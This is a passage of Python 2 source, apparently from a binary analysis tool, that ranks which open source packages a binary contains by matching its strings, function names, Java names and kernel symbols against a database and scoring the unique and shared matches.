for package in variablepvs['versionresults'].keys():
newuniques = variablepvs['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
variablepvs['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
variablepvs['packages'][package].append((v, vs[v]))
variablepvs['versionresults'] = newresults
if changed:
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'] = list(set(leafreports['tags'] + ['ranking']))
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
cPickle.dump(leafreports, leaf_file)
leaf_file.close()
unpackreport['tags'].append('ranking')
## finally shut down the scan manager
scanmanager.shutdown()
## grab variable names.
def grab_sha256_varname(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
def grab_sha256_filename(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab copyright statements from the license database
def grab_sha256_copyright(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
## 'statements' are not very accurate so ignore those
results = filter(lambda x: x[1] != 'statement', results)
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab licenses from the license database
def grab_sha256_license(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
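## The grab_sha256_* workers above all follow the same contract: pull a checksum
## from scanqueue, put a single-entry dictionary on reportqueue and mark the task
## done, so the consumer can merge the results with dict.update(). Result shapes,
## derived from the queries used above (all values made up, checksums shortened):
## grab_sha256_filename  -> {'ab12...': [('1.2.0', 'src/foo.c'), ('1.2.1', 'src/foo.c')]}
## grab_sha256_license   -> {'ab12...': [('GPL-2.0', 'ninka')]}
## grab_sha256_copyright -> {'ab12...': [('Copyright (c) 2003 Jane Doe', 'person')]}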
def grab_sha256_parallel(scanqueue, reportqueue, cursor, conn, language, querytype):
stringquery = "select distinct checksum, linenumber, language from extracted_string where stringidentifier=%s and language=%s"
functionquery = "select distinct checksum, linenumber, language from extracted_function where functionname=%s"
variablequery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
kernelvarquery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
while True:
res = None
line = scanqueue.get(timeout=2592000)
if querytype == "string":
cursor.execute(stringquery, (line,language))
res = cursor.fetchall()
elif querytype == 'function':
cursor.execute(functionquery, (line,))
res = cursor.fetchall()
elif querytype == 'variable':
cursor.execute(variablequery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'variable', res)
elif querytype == 'kernelvariable':
cursor.execute(kernelvarquery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'kernelsymbol', res)
conn.commit()
if res != None:
res = filter(lambda x: x[2] == language, res)
## TODO: make a list of line numbers
res = map(lambda x: (x[0], x[1]), res)
reportqueue.put((line, res))
scanqueue.task_done()
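## grab_sha256_parallel reports tuples of the form (identifier, [(checksum,
## linenumber), ...]), e.g. ('failed to allocate dma buffer', [('ab12...', 312)])
## for a string identifier (values made up, checksum shortened).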
def extractJava(javameta, scanenv, funccursor, funcconn, clones):
dynamicRes = {} # {'namesmatched': 0, 'totalnames': int, 'uniquematches': int, 'packages': {} }
namesmatched = 0
uniquematches = 0
uniquepackages = {}
variablepvs = {}
if 'fields' in javameta:
fields = javameta['fields']
else:
fields = []
if 'classes' in javameta:
classes = javameta['classes']
else:
classes = []
if 'sourcefiles' in javameta:
sourcefiles = javameta['sourcefiles']
else:
sourcefiles = []
methods = javameta.get('methods', [])
if 'BAT_METHOD_SCAN' in scanenv:
query = "select distinct package from functionnamecache_java where functionname=%s"
for meth in methods:
if meth == 'main':
continue
funccursor.execute(query, (meth,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
namesmatched += 1
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]].append(meth)
else:
uniquepackages[packages_tmp[0]] = [meth]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['totalnames'] = len(set(methods))
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['uniquematches'] = uniquematches
## unique matches found.
if uniquematches != 0:
dynamicRes['packages'] = {}
## Now variable names
classpvs = {}
sourcepvs = {}
fieldspvs = {}
## classes and source file names are searched in a similar way.
## Of course, it could be that the source file is different from the
## class file (apart from the extension of course) but this is very
## uncommon. TODO: merge class name and source file name searching
if 'BAT_CLASSNAME_SCAN' in scanenv:
classes = set(map(lambda x: x.split('$')[0], classes))
query = "select package from classcache_java where classname=%s"
for i in classes:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
classname = i
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
if classres == []:
## check just the last component
classname = classname.split('.')[-1]
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = list(set(classres_tmp))
classres = map(lambda x: (x, 0), classres_tmp)
classpvs[classname] = classres
for i in javameta['sourcefiles']:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
if i.lower().endswith('.java'):
classname = i[0:-5]
else:
classname = i
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = set(classres_tmp)
classres = map(lambda x: (x, 0), classres_tmp)
sourcepvs[classname] = classres
## A list of Java fields that should be ignored
ignorefields = set(['value', 'name', 'type', 'data', 'options', 'parent', 'description', 'instance', 'port', 'out', 'properties', 'project', 'next', 'id', 'listeners', 'status', 'target', 'result', 'index', 'buffer', 'values', 'count', 'size', 'key', 'path', 'cache', 'map', 'file', 'context', 'initialized', 'verbose', 'version', 'debug', 'message', 'attributes', 'url', 'DEBUG', 'NAME', 'state', 'source', 'password', 'text', 'start', 'factory', 'entries', 'buf', 'args', 'logger', 'config', 'length', 'encoding', 'method', 'resources', 'timeout', 'filename', 'offset', 'server', 'mode', 'in', 'connection'])
## Keep a list of which sha256s were already seen. Since the files are
## likely only coming from a few packages there is no need to hit the database
## that often.
sha256cache = {}
if 'BAT_FIELDNAME_SCAN' in scanenv:
query = "select package from fieldcache_java where fieldname=%s"
for f in fields:
## a few fields are so common that they will be completely useless
## for reporting, but processing them will take a *lot* of time, so
## just skip them. This list is based on research of many many Java
## source code files.
if f in ignorefields:
continue
pvs = []
funccursor.execute(query, (f,))
fieldres = funccursor.fetchall()
funcconn.commit()
if fieldres != []:
fieldres_tmp = []
for r in fieldres:
if r[0] in clones:
field_tmp = clones[r[0]]
fieldres_tmp.append(field_tmp)
else:
fieldres_tmp.append(r[0])
fieldres_tmp = set(fieldres_tmp)
fieldres = map(lambda x: (x, 0), fieldres_tmp)
fieldspvs[f] = fieldres
variablepvs['fields'] = fieldspvs
variablepvs['sources'] = sourcepvs
variablepvs['classes'] = classpvs
## these are the unique function names only, just add some stubs here
for i in uniquepackages:
versions = []
dynamicRes['packages'][i] = []
return (dynamicRes, variablepvs)
def scankernelsymbols(variables, scanenv, kernelquery, funccursor, funcconn, clones):
allvvs = {}
uniquevvs = {}
variablepvs = {}
for v in variables:
pvs = []
funccursor.execute(kernelquery, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
variablepvs['type'] = 'linuxkernel'
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return variablepvs
## From dynamically linked ELF files it is possible to extract the dynamic
## symbol table. This table lists the functions and variables which are needed
## from external libraries, but also lists local functions and variables.
## By searching a database that contains which function names and variable names
## can be found in which packages it is possible to identify which package was
## used.
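## For illustration only (the actual extraction happens in an earlier BAT scan):
## the names passed in via 'scanstr' and 'variables' are the kind of entries
## that "readelf --dyn-syms <binary>" prints for a dynamically linked ELF file.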
def scanDynamic(scanstr, variables, scanenv, funccursor, funcconn, clones):
dynamicRes = {}
variablepvs = {}
if not ('BAT_FUNCTION_SCAN' in scanenv or 'BAT_VARNAME_SCAN' in scanenv):
return (dynamicRes, variablepvs)
if 'BAT_FUNCTION_SCAN' in scanenv:
uniquepackages = {}
namesmatched = 0
uniquematches = 0
## caching datastructure, only needed in case there is no full cache
sha256_packages = {}
## the database made from ctags output only has function names, not the types. Since
## C++ functions could be in an executable several times with different types we
## deduplicate first
query = "select package from functionnamecache_c where functionname=%s"
for funcname in scanstr:
funccursor.execute(query, (funcname,))
res = funccursor.fetchall()
funcconn.commit()
pkgs = []
if res != []:
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
namesmatched += 1
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]] += [funcname]
else:
uniquepackages[packages_tmp[0]] = [funcname]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['totalnames'] = len(scanstr)
## unique matches found.
dynamicRes['uniquematches'] = uniquematches
if uniquematches != 0:
dynamicRes['packages'] = {}
dynamicRes['versionresults'] = {}
## these are the unique function names only
## TODO: here versions for function names were computed. This needs clean ups.
for package in uniquepackages:
versions = []
dynamicRes['versionresults'][package] = []
dynamicRes['packages'][package] = []
for v in set(versions):
dynamicRes['packages'][package].append((v, versions.count(v)))
## Scan C variables extracted from dynamically linked files.
if scanenv.get('BAT_VARNAME_SCAN'):
ignorevariables = set(['options', 'debug', 'verbose', 'optarg', 'optopt', 'optfind', 'optind', 'opterr'])
## keep two mappings:
## 1. unique variable names per package
## 2. package per variable name
uniquevvs = {}
allvvs = {}
query = "select distinct package from varnamecache_c where varname=%s"
for v in variables:
## These variable names are very generic and would not be useful, so skip.
## This is based on research of millions of C files.
if v in ignorevariables:
continue
pvs = []
funccursor.execute(query, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return (dynamicRes, variablepvs)
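## A sketch of the (dynamicRes, variablepvs) pair produced above when there are
## unique matches (values illustrative):
## dynamicRes = {'namesmatched': 42, 'totalnames': 100, 'uniquematches': 7,
##               'uniquepackages': {'busybox': ['bb_show_usage']},
##               'packages': {'busybox': []}, 'versionresults': {'busybox': []}}
## variablepvs = {'uniquepackages': {'busybox': ['bb_common_bufsiz1']},
##                'allvariables': {'bb_common_bufsiz1': ['busybox']},
##                'packages': {'busybox': []}, 'versionresults': {'busybox': []}}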
## match identifiers with data in the database
## First match string literals, then function names and variable names for various languages
def lookup_identifier(scanqueue, reportqueue, cursor, conn, scanenv, topleveldir, avgscores, clones, scandebug, unmatchedignorecache, lock):
## first some things that are shared between all scans
if 'BAT_STRING_CUTOFF' in scanenv:
try:
stringcutoff = int(scanenv['BAT_STRING_CUTOFF'])
except:
stringcutoff = 5
else:
stringcutoff = 5
## TODO: this should be done per language
if 'BAT_SCORE_CACHE' in scanenv:
precomputescore = True
else:
precomputescore = False
usesourceorder = False
if 'USE_SOURCE_ORDER' in scanenv:
usesourceorder = True
## don't use precomputed scores when using source order
precomputescore = False
## default parameters for scoring
alpha = 5.0
scorecutoff = 1.0e-20
gaincutoff = 1
kernelquery = "select package FROM linuxkernelfunctionnamecache WHERE functionname=%s LIMIT 1"
precomputequery = "select score from scores where stringidentifier=%s LIMIT 1"
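## The score of a matched string is computed further down as
##     score = len(line) / pow(alpha, len(filenames) - 1)
## so a string that only occurs in a single file name keeps its full length as
## its score, and every additional file name divides the score by alpha.
## Worked example with the defaults above: a 20 character string seen in 3
## different file names scores 20 / 5.0 ** 2 = 0.8.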
while True:
## get a new task from the queue
(filehash, filename) = scanqueue.get(timeout=2592000)
## read the pickle with the data
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
if leafreports['identifier'] == {}:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
## grab the lines extracted earlier
lines = leafreports['identifier']['strings']
language = leafreports['identifier']['language']
## this should of course not happen, but hey...
scanlines = True
if not language in scanenv['supported_languages']:
scanlines = False
if lines == None:
lenlines = 0
scanlines = False
else:
lenlines = len(lines)
linuxkernel = False
scankernelfunctions = False
if 'linuxkernel' in leafreports['tags']:
linuxkernel = True
if scanenv.get('BAT_KERNELFUNCTION_SCAN') == 1 and language == 'C':
scankernelfunctions = True
## first compute the score for the lines
if lenlines != 0 and scanlines:
## keep a dict of versions, license and copyright statements per package. TODO: remove these.
packageversions = {}
packagelicenses = {}
packagecopyrights = {}
if have_counter:
linecount = collections.Counter(lines)
else:
linecount = {}
for l in lines:
if l in linecount:
linecount[l] += 1
else:
linecount[l] = 1
## first look up and assign strings for as far as possible.
## strings that have not been assigned will be assigned later based
## on their score.
## Look up strings in the database and assign strings to packages.
uniqueMatches = {}
nonUniqueScore = {}
stringsLeft = {}
sameFileScore = {}
nonUniqueMatches = {}
nonUniqueMatchLines = []
nonUniqueAssignments = {}
directAssignedString = {}
unmatched = []
ignored = []
#unmatchedignorecache = set()
kernelfuncres = []
kernelparamres = []
if scandebug:
print >>sys.stderr, "total extracted strings for %s: %d" % (filename, lenlines)
## some counters for keeping track of how many matches there are
matchedlines = 0
unmatchedlines = 0
matchednotclonelines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
nrUniqueMatches = 0
## start values for some state variables that are used
## most of these are only used if 'usesourceorder' == False
matched = False
matchednonassigned = False
matchednotclones = False
kernelfunctionmatched = False
uniquematch = False
oldline = None
notclones = []
if usesourceorder:
## keep track of which package was the most uniquely matched package
uniquepackage_tmp = None
uniquefilenames_tmp = []
## keep a backlog for strings that could possibly be assigned later
backlog = []
notclonesbacklog = []
else:
## sort the lines first, so it is easy to skip duplicates
lines.sort()
stringquery = "select package, filename FROM %s WHERE stringidentifier=" % stringsdbperlanguagetable[language] + "%s"
for line in lines:
#if scandebug:
# print >>sys.stderr, u"processing <|%s|>" % line
kernelfunctionmatched = False
if not usesourceorder:
## speedup if the line happens to be the same as the old one
## This does *not* alter the score in any way, but perhaps
## it should: having a very significant string a few times
## is a strong indication.
if line == oldline:
if matched:
matchedlines += 1
if uniquematch:
nrUniqueMatches += 1
#uniqueMatches[package].append((line, []))
elif matchednonassigned:
linecount[line] = linecount[line] - 1
matchednonassignedlines += 1
elif matchednotclones:
linecount[line] = linecount[line] - 1
matchednotclonelines += 1
else:
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
uniquematch = False
matched = False
matchednonassigned = False
matchednotclones = False
oldline = line
## skip empty lines (only triggered if stringcutoff == 0)
if line == "":
continue
lock.acquire()
if line in unmatchedignorecache:
lock.release()
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
lock.release()
if len(line) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
## An extra check for lines that score extremely low. This
## helps reduce load on databases stored on slower disks. Only used if
## precomputescore is set and "source order" is False.
if precomputescore:
cursor.execute(precomputequery, (line,))
scoreres = cursor.fetchone()
conn.commit()
if scoreres != None:
## If the score is so low it will not have any influence on the final
## score, why even bother hitting the disk?
## Since there might be package rewrites this should be a bit less than the
## cut off value that was defined.
if scoreres[0] < scorecutoff/100:
nonUniqueMatchLines.append(line)
matchednonassignedlines += 1
matchednonassigned = True
linecount[line] = linecount[line] - 1
continue
## if scoreres is None the line could still be something else like a kernel function, or a
## kernel string in a different format, so keep searching.
## If the image is a Linux kernel image first try Linux kernel specific matching
## like function names, then continue as normal.
if linuxkernel:
## This is where things get a bit ugly. The strings in a Linux
## kernel image could also be function names, not string constants.
## There could be false positives here...
if scankernelfunctions:
cursor.execute(kernelquery, (line,))
kernelres = cursor.fetchall()
conn.commit()
if len(kernelres) != 0:
kernelfuncres.append(line)
kernelfunctionmatched = True
linecount[line] = linecount[line] - 1
continue
## then see if there is anything in the cache at all
try:
cursor.execute(stringquery, (line,))
except:
conn.commit()
## something weird is going on here, probably
## with encodings, so just ignore the line for
## now.
## One example is com.addi_40_src/src/com/addi/toolbox/crypto/aes.java
## from F-Droid. At line 221 there is a string SS.
## This string poses a problem.
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
res = cursor.fetchall()
conn.commit()
if len(res) == 0 and linuxkernel:
## make a copy of the original line
origline = line
## try a few variants that could occur in the Linux kernel
## The values of KERN_ERR and friends have changed in the years.
## In 2.6 it used to be for example <3> (defined in include/linux/kernel.h
## or include/linux/printk.h )
## In later kernels this was changed.
matchres = reerrorlevel.match(line)
if matchres != None:
scanline = line.split('>', 1)[1]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
line = scanline
else:
scanline = scanline.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
else:
## In include/linux/kern_levels.h since kernel 3.6 a different format is
## used. TODO: actually check in the binary whether or not a match (if any)
## is preceded by 0x01
matchres = rematch.match(line)
if matchres != None:
scanline = line[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
if len(res) == 0:
scanline = line.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
## result is still empty, perhaps it is a module parameter. TODO
if len(res) == 0:
if '.' in line:
if line.count('.') == 1:
paramres = reparam.match(line)
if paramres != None:
pass
## if 'line' has been changed, then linecount should be changed accordingly
if line != origline:
linecount[origline] = linecount[origline] - 1
if line in linecount:
linecount[line] = linecount[line] + 1
else:
linecount[line] = 1
## nothing in the cache
if len(res) == 0:
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
if len(res) != 0:
## Assume:
## * database has no duplicates
## * filenames in the database have been processed using os.path.basename()
if scandebug:
print >>sys.stderr, "\n%d matches found for <(|%s|)> in %s" % (len(res), line, filename)
pkgs = {} ## {package name: set([filenames without path])}
filenames = {}
## For each string determine in how many packages (without version) the string
## is found.
## If the string is only found in one package the string is unique to the package
## so record it as such and add its length to a score.
for result in res:
(package, sourcefilename) = result
if package in clones:
package = clones[package]
if not package in pkgs:
pkgs[package] = set([sourcefilename])
else:
pkgs[package].add(sourcefilename)
if not sourcefilename in filenames:
filenames[sourcefilename] = [package]
else:
filenames[sourcefilename] = list(set(filenames[sourcefilename] + [package]))
if len(pkgs) != 1:
nonUniqueMatchLines.append(line)
## The string found is not unique to a package, but is it
## unique to a filename?
## This method assumes that files that are named the same
## also contain the same or similar content. This could lead
## to incorrect results.
## now determine the score for the string
try:
score = len(line) / pow(alpha, (len(filenames) - 1))
except Exception, e:
## pow(alpha, (len(filenames) - 1)) is overflowing here
## so the score would be very close to 0. The largest value
## is sys.maxint, so use that one. The score will be
## smaller than almost any value of scorecutoff...
if usesourceorder:
score = len(line) / sys.maxint
else:
matchednonassigned = True
matchednonassignedlines += 1
linecount[line] = linecount[line] - 1
continue
## if it is assumed that the compiler puts string constants in the
## same order in the generated code then strings can be assigned
## to the package directly
if usesourceorder:
if uniquepackage_tmp in pkgs:
assign_string = False
assign_filename = None
for pf in uniquefilenames_tmp:
if pf in pkgs[uniquepackage_tmp]:
assign_string = True
assign_filename = pf
break
if assign_string:
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [line]
else:
nonUniqueMatches[uniquepackage_tmp].append(line)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((line, assign_filename, score))
else:
directAssignedString[uniquepackage_tmp] = [(line, assign_filename, score)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
matchedlines += 1
linecount[line] = linecount[line] - 1
continue
else:
## store pkgs and line for backward lookups
backlog.append((line, pkgs[uniquepackage_tmp], score))
if not score > scorecutoff:
matchednonassigned = True
matchednonassignedlines += 1
if not usesourceorder:
linecount[line] = linecount[line] - 1
continue
## After having computed a score determine if the files
## the string was found in are all called the same.
## filenames: {filename: [package names]}
if filter(lambda x: len(filenames[x]) != 1, filenames.keys()) == []:
matchednotclonelines += 1
for fn in filenames:
## The filename fn containing the matched string can only
## be found in one package.
## For example: string 'foobar' is present in 'foo.c' in package 'foo'
## and 'bar.c' in package 'bar', but not in 'foo.c' in package 'bar'
## or 'bar.c' in foo (if any).
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey,0) + score
matchednotclones = True
if not usesourceorder:
linecount[line] = linecount[line] - 1
notclones.append((line, filenames))
else:
notclonesbacklog.append((line, filenames))
continue
else:
for fn in filenames:
## There are multiple packages in which the same
## filename contains this string, for example 'foo.c'
## in packages 'foo' and 'bar'. This is likely to be
## internal cloning in the repo. This string is
## assigned to a single package in the loop below.
## Some strings will not significantly contribute to the score, so they
## could be ignored and not added to the list.
## For now exclude them, but in the future they could be included for
## completeness.
stringsLeft['%s\t%s' % (line, fn)] = {'string': line, 'score': score, 'filename': fn, 'pkgs' : filenames[fn]}
## lookup
else:
## the string is unique to this package and this package only
uniquematch = True
## store the uniqueMatches without any information about checksums
if not package in uniqueMatches:
uniqueMatches[package] = [(line, [])]
else:
uniqueMatches[package].append((line, []))
linecount[line] = linecount[line] - 1
if usesourceorder:
uniquepackage_tmp = package
uniquefilenames_tmp = pkgs[package]
## process backlog
for b in xrange(len(backlog), 0, -1):
assign_string = False
assign_filename = None
(backlogline, backlogfilenames, backlogscore) = backlog[b-1]
for pf in uniquefilenames_tmp:
if pf in backlogfilenames:
assign_string = True
assign_filename = pf
break
if assign_string:
## keep track of the old score in case it is changed/recomputed here
oldbacklogscore = backlogscore
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [backlogline]
else:
nonUniqueMatches[uniquepackage_tmp].append(backlogline)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((backlogline, assign_filename, backlogscore))
else:
directAssignedString[uniquepackage_tmp] = [(backlogline, assign_filename, backlogscore)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
## remove the directly assigned string from stringsLeft,
## at least for *this* package
try:
for pf in backlogfilenames:
del stringsLeft['%s\t%s' % (backlogline, pf)]
except KeyError, e:
pass
## decrease matchednonassignedlines if the originally computed score
## was too low
if not oldbacklogscore > scorecutoff:
matchednonassignedlines = matchednonassignedlines - 1
linecount[backlogline] = linecount[backlogline] - 1
for cl in notclonesbacklog:
(notclone, filenames) = cl
if notclone == backlogline:
matchednotclonelines -= 1
for fn in filenames:
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey, 0) - backlogscore
notclonesbacklog.remove(cl)
break
else:
break
## store notclones for later use
notclones += notclonesbacklog
backlog = []
notclonesbacklog = []
matched = True
## for statistics it's nice to see how many lines were matched
matchedlines += 1
## clean up stringsLeft first
for l in stringsLeft.keys():
if linecount[stringsLeft[l]['string']] == 0:
del stringsLeft[l]
## done looking up and assigning all the strings
uniqueScore = {}
for package in uniqueMatches:
if not package in uniqueScore:
uniqueScore[package] = 0
for line in uniqueMatches[package]:
uniqueScore[package] += len(line[0])
directAssignedScore = {}
for package in directAssignedString:
if not package in directAssignedScore:
directAssignedScore[package] = 0
for line in directAssignedString[package]:
directAssignedScore[package] += line[2]
## If the string is not unique, do a little bit more work to determine which
## file is the most likely, so also record the filename.
##
## 1. determine whether the string is unique to a package
## 2. if not, determine which filenames the string is in
## 3. for each filename, determine whether or not this file (containing the string)
## is unique to a package
## 4. if not, try to determine the most likely package the string was found in
## For each string that occurs in the same filename in multiple
## packages (e.g., "debugXML.c", a cloned file of libxml2 in several
## packages), assign it to one package. We do this by picking the
## package that would gain the highest score increment across all
## strings that are left. This is repeated until no strings are left.
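## In short, the assignment loop below works like this (a summary of the code
## that follows, not a replacement for it):
#
# while stringsLeft:
#     compute gain[package] = sum of the scores of the remaining strings that
#         could still be assigned to that package
#     best = package with the highest gain (near-ties broken via avgscores)
#     assign all of best's remaining strings to best and update sameFileScore
#     stop as soon as the best gain drops below gaincutoff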
pkgsScorePerString = {}
for stri in stringsLeft:
pkgsSortedTmp = map(lambda x: {'package': x, 'uniquescore': uniqueScore.get(x, 0)}, stringsLeft[stri]['pkgs'])
## get the unique score per package and sort in reverse order
pkgsSorted = sorted(pkgsSortedTmp, key=lambda x: x['uniquescore'], reverse=True)
## and get rid of the unique scores again. Now it's sorted.
pkgsSorted = map(lambda x: x['package'], pkgsSorted)
pkgs2 = []
for pkgSort in pkgsSorted:
if uniqueScore.get(pkgSort, 0) == uniqueScore.get(pkgsSorted[0], 0):
pkgs2.append(pkgSort)
pkgsScorePerString[stri] = pkgs2
newgain = {}
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
newgain[p2] = newgain.get(p2, 0) + stringsLeft[stri]['score']
useless_packages = set()
for p in newgain.keys():
## check if packages could ever contribute usefully.
if newgain[p] < gaincutoff:
useless_packages.add(p)
## walk through the data again, filter out useless stuff
new_stringsleft = {}
string_split = {}
for stri in stringsLeft:
## filter out the strings that only occur in packages that will contribute
## to the score. Ignore the rest.
if filter(lambda x: x not in useless_packages, pkgsScorePerString[stri]) != []:
new_stringsleft[stri] = stringsLeft[stri]
strsplit = stri.rsplit('\t', 1)[0]
if strsplit in string_split:
string_split[strsplit].add(stri)
else:
string_split[strsplit] = set([stri])
## the difference between stringsLeft and new_stringsleft is matched
## but unassigned if the strings *only* occur in stringsLeft
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
for i in oldstrleft.difference(set(string_split.keys())):
matchednonassignedlines += linecount[i]
matchedlines -= linecount[i]
stringsLeft = new_stringsleft
roundNr = 0
strleft = len(stringsLeft)
## keep track of which strings were already found. This is because each string
## is only considered once anyway.
while strleft > 0:
roundNr = roundNr + 1
#if scandebug:
# print >>sys.stderr, "\nround %d: %d strings left" % (roundNr, strleft)
gain = {}
stringsPerPkg = {}
## cleanup
if roundNr != 0:
todelete = set()
for stri in stringsLeft:
if linecount[stringsLeft[stri]['string']] == 0:
todelete.add(stri)
for a in todelete:
del stringsLeft[a]
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
## Determine to which packages the remaining strings belong.
newstrleft = set()
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
if p2 in useless_packages:
continue
